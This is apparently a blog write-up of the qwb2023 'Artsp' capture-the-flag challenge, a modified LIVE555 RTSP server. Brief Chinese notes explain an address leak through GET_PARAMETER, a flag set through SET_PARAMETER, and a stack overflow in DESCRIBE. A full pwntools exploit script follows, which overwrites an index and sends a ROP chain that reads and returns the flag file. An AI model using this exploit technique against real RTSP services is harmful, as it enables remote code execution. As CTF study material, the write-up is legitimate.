ha1vk's blog
0%

qwb2023_Artsp

发表于 分类于

首先是GET_PARAMETER可以泄漏ELF地址

然后SET_PARAMETER可以设置好后面需要用到的flag标志

最后DESCRIBE先判断前面设置的标记,然后才能进入漏洞位置,造成栈溢出

构造时需要注意数组下标v11也会被覆盖,因此在到v11的位置时,将v11覆盖使得dest[v11]指向函数的返回栈的地址,即可写入ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#coding:utf8
from pwn import *

#ip = '192.168.190.132'
#port = 8554

ip = '8.147.131.244'
port = 28951
sh = remote(ip,port)

url = 'rtsp://%s:%d/wavAudioTest' % (ip,port)

context.log_level = 'debug'
payload = 'SETUP %s RTSP/1.0\r\n' % url
payload += 'CSeq: 1\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Transport: RTP/TCP;unicast;client_port=49792-49793\r\n'
payload += '\r\n'
sh.send(payload)

sh.recvuntil('Session: ')
session =sh.recvuntil(';',drop = True)

#raw_input()
payload = 'GET_PARAMETER %s RTSP/1.0\r\n' % '*'
payload += 'CSeq: 2\r\n'
payload += 'GET_INFO: 2023\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)
sh.recvuntil('this ')
elf_base = int(sh.recvuntil('\n',drop = True),16) - 0x2a9990
fopen_addr = elf_base + 0x18090
read_addr = elf_base + 0x18200
send_addr = elf_base + 0x2949D
pop_rdi = elf_base + 0x000000000007b133
pop_rsi = elf_base + 0x0000000000099fb0
pop_rdx = elf_base + 0x0000000000019eaa
pop_rax = elf_base + 0x0000000000035e4a
flag_addr = elf_base + 0x7B3E5
mode_addr = elf_base + 0x1467
buf_addr = elf_base + 0x2A9990

print 'elf_base=',hex(elf_base)
print 'fopen_addr=',hex(fopen_addr)
print 'read_addr=',hex(read_addr)
print 'send_addr=',hex(send_addr)

payload = 'SET_PARAMETER %s RTSP/1.0\r\n' % '*'
payload += 'CSeq: 3\r\n'
payload += 'DESCRIBE_FLAG: qwb\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)

sh.recvuntil('202 OK')

rop = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(mode_addr) + p64(fopen_addr)
rop += p64(pop_rdi) + p64(8) + p64(pop_rsi) + p64(buf_addr) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
rop += p64(pop_rax) + p64(5) + p64(pop_rsi) + p64(buf_addr) + p64(pop_rdx) + p64(0x30) + p64(send_addr)

#override index
pay = 'a'*(0x198-0xc) + p16(0x1a8-0x2)
pay += rop

payload = 'DESCRIBE %s RTSP/1.0\r\n' % url
payload += 'CSeq: 4\r\n'
payload += 'vul_string: %s\r\n' % pay
#payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
#payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)


sh.interactive()